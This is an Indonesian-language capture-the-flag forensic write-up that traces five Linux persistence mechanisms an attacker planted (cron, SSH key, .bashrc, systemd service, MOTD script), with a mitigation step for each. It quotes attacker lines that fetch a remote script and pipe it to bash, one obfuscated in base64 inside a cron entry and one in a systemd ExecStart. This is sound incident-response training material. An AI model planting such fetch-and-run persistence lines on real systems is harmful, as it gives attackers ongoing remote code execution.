Hide And Seek
Sistem Ubuntu ditemukan telah dikompromikan oleh seorang penyerang bernama Cipher. Ia meninggalkan sebuah catatan yang menantang saya untuk menemukan persistence mechanisms yang digunakannya agar tetap dapat mengakses sistem. Petunjuk yang diberikan oleh Cipher membantu saya mengidentifikasi metode yang digunakan.
Category: Forensic || Level: EASY
Investigasi Berdasarkan Petunjuk Cipher
Cipher memberikan 5 (lima) petunjuk terkait metode persistence yang digunakannya. Berikut adalah investigasi yang saya lakukan berdasarkan setiap petunjuk dan bagaimana metode tersebut cocok dengan tantangan.
Petunjuk Pertama: "Time is on my side, always running like clockwork."
π Indikasi
Petunjuk ini mengarah pada sesuatu yang berjalan secara terjadwal, seperti cron jobs. Saya memeriksa log dan menemukan entri mencurigakan:
/bin/bash -c 'echo Y3VybCAtcyA1NDQ4NGQ3Yjc5MzAuc3RvcmFnM19jMXBoM3JzcXU0ZC5uZXQvYS5zaCB8IGJhc2gK | base64 -d | bash'
π Analisis
Setelah mendekodekan base64, perintah ini berubah menjadi:
curl -s 54484d7b7930.storag3_c1ph3rsqu4d.net/a.sh | bash
Kemudian, mendekodekan hex 54484d7b7930 menghasilkan bagian pertama flag:
THM{y0
Cocok dengan petunjuk: Cron job berjalan secara terjadwal, sesuai dengan "Time is on my side."
π Mitigasi
sudo crontab -eΒ # Hapus entri yang mencurigakan
Petunjuk Kedua: "A secret handshake gets me in every time."
π Indikasi
Petunjuk ini merujuk pada mekanisme autentikasi tersembunyi, seperti SSH backdoor. Saya menemukan kunci mencurigakan dalam /home/zeroday/.ssh/.authorized_keys:
π Analisis:Β
Mendekodekan hex 326e6420706172743a20755f6730745f menghasilkan bagian kedua flag:
Cocok dengan petunjuk: SSH key ini adalah "secret handshake" yang digunakan oleh penyerang untuk masuk kembali ke sistem.
π Mitigasi
rm /home/zeroday/.ssh/.authorized_keys
Petunjuk Ketiga: "Whenever you set the stage, I make my entrance."
π Indikasi
Petunjuk ini mengarah pada sesuatu yang berjalan setiap kali pengguna masuk ke shell, seperti .bashrc. Saya menemukan perintah mencurigakan dalam /home/specter/.bashrc:
π Analisis
Setelah mendekodekan hex, nilai 4d334a6b58334130636e513649444e324d334a3564416f3d menghasilkan bagian ketiga flag:
Cocok dengan petunjuk: .bashrc dieksekusi setiap kali pengguna membuka terminal, sesuai dengan "set the stage."
π Mitigasi
nano /home/specter/.bashrcΒ # Hapus baris dengan Netcat reverse shell
Petunjuk Keempat: "I run with the big dogs, booting up alongside the system."
π Indikasi
Petunjuk ini mengarah ke systemd service, yang berjalan saat sistem melakukan booting. Saya menjalankan:
sudo systemctl list-unit-files --type=service | grep enabled
Ditemukan service mencurigakan cipher.service:
systemctl status cipher.service
cat /usr/lib/systemd/system/cipher.service
ExecStart=/bin/bash -c 'wget NHRoIHBhcnQgLSBoMW5nXyAK.s1mpl3bd.com --output - | bash'
π Analisis
Setelah mendekodekan hex, nilai 4e48726f4948426f4e795f menghasilkan bagian keempat flag:
Cocok dengan petunjuk: Systemd service berjalan otomatis saat sistem booting, seperti "big dogs."
π Mitigasi
sudo systemctl stop cipher.service
sudo systemctl disable cipher.service
sudo rm /usr/lib/systemd/system/cipher.service
sudo systemctl daemon-reload
Petunjuk Kelima: "I love welcome messages."
π Indikasi
Petunjuk ini mengarah ke Message of the Day (MOTD) yang muncul saat pengguna login. Dalam /etc/update-motd.d/00-header, saya menemukan skrip Python berbahaya:
π Analisis
Setelah mendekodekan hex, nilai 4c61737420706172743a206430776e7d0 menghasilkan bagian terakhir flag:
Cocok dengan petunjuk: Skrip ini berjalan setiap kali ada login ke sistem, sesuai dengan "welcome messages."
π Mitigasi
sudo nano /etc/update-motd.d/00-headerΒ # Hapus skrip Python berbahaya
Final Flag π―
Dari hasil investigasi, saya berhasil menyusun flag lengkap:
THM{y0u_g0t_3v3ryt_h1ng_d0wn}
Kesimpulan
Tantangan ini menunjukkan berbagai metode persistence yang digunakan oleh penyerang, mulai dari cron jobs, SSH backdoors, reverse shells, systemd services, hingga manipulasi MOTD. Dengan memahami metode ini, saya dapat lebih waspada dalam mendeteksi dan menghapus ancaman serupa.